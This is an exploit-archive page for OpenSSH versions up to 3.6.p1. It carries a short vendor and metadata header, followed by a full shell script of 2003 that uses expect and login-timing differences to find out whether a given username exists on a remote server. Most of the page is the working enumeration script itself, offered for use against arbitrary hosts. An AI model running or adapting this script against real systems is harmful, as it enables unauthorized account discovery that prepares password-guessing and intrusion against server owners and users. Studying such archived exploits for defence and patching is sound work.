OpenSSH - exploit.company

vendor:

OpenSSH

by:

Nicolas Couture

N/A

CVSS

N/A

User Identification

CWE

Product Name: OpenSSH

Affected Version From: <= 3.6.p1

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2003

OpenSSH <= 3.6.p1 - User Identification

This script can be used to check whether a user exists on a remote server running OpenSSH. It relies on the timing difference between valid and invalid user login attempts to determine if a user exists or not. It is accurate against Red Hat boxes and Linux boxes running grsecurity, but not vulnerable on *BSD boxes which always have a 10-second delay.

Mitigation:

Source

Exploit-DB raw data:

#!/bin/sh
# OpenSSH <= 3.6.p1 - User Identification.
# Nicolas Couture - nc@stormvault.net
#
# Description:
#	-Tells you wether or not a user exist on
#	  a distant server running OpenSSH.
# 
# Usage:
#	-You NEED to have the host's public key
#	  before executing this script. 
#

#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# Fact Sheet:					 #
#	  o It is really accurate against	 #
#	    redhat boxes.			 #
# 	  o Linux boxes running grsecurity	 #
#	    has 10 seconds delay on both	 #
#	    valid AND invalid user login	 #
#	    attempts.				 #
#	  o *BSD boxes are not vulnerables and	 #
#	     always has 10 seconds delay like  	 #
#	     Linux-Grsec + network protection    #
#						 #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#

#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
# History:				 
#	 Thu May  1 15:41:18 EDT 2003  
#	  ; Script started.		
#	 Thu May  1 16:42:30 EDT 2003	
#	  ; Script is functional.	             
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#

# Let the user know how we work.
usage(){
 echo "$0 <user> <host>"
 exit 1
}

# Verify the arguments.
[ $# != 2 ] && usage

# Variables.
USER="$1"
HOST="$2"

#=-=-=-=-=-=-=-=-=-=-=-=-=#
# Expect script functions         #
#=-=-=-=-=-=-=-=-=-=-=-=-=#

# Expect script for password.
expasswd() {
cat << EOF > expasswd 
spawn $SSHCMD
expect password:
send '\r'
interact
EOF
}

# Expect script for error.
experror() {
cat << EOF > experror
spawn expect -f expasswd
expect again.
exit 1593
interact
EOF
}

#=-=-=-=-=-=-=-=-=-=#
# -Fake user timing      #
#=-=-=-=-=-=-=-=-=-=#

# OpenSSH client command for inexisting user.
export SSHCMD="ssh nicolas_couture@$HOST"

# Build new expect script.
expasswd
experror

# Timing.
FDATE0=`date '+%s'`
echo "[-] Calculating fake user timeout..."
expect -f experror 1> /dev/null 2> /dev/null
FDATE1=`date '+%s'`

# Fake user timeout.
FUTO=`echo $FDATE1 - $FDATE0 | bc`
echo "[+] Found $FUTO."

#=-=-=-=-=-=-=-=#
# -$USER timing    #
#=-=-=-=-=-=-=-=#

# OpenSSH command.
export SSHCMD="ssh $USER@$HOST"

# Build new expect scripts.
expasswd
experror

DATE0=`date '+%s'`
echo "[-] Calculating $USER timeout on $SERVER..."
expect -f experror 1> /dev/null 2> /dev/null
DATE1=`date '+%s'`

# $USER timeout.
END=`echo $DATE1 - $DATE0 | bc`
echo "[+] Found $END."

#=-=-=-=-=#
# -Result    #
#=-=-=-=-=#

if [ "$FUTO" -eq "$END" ] && [ "$FUTO" -eq "10" ]; then
 echo "This box is not vulnerable."
 exit 1
fi

# Use of our magic skills.
if [ "$FUTO" -lt "$END" ]; then
 echo "$USER exist on $HOST."
elif [ "$FUTO" -ge "$END" ]; then
 echo "$USER doesn't exist on $HOST."
else
 echo "Segmentation fault."
 exit 13
fi

# Remove tmp files.
rm -rf expasswd experror

# EOF

# milw0rm.com [2003-05-02]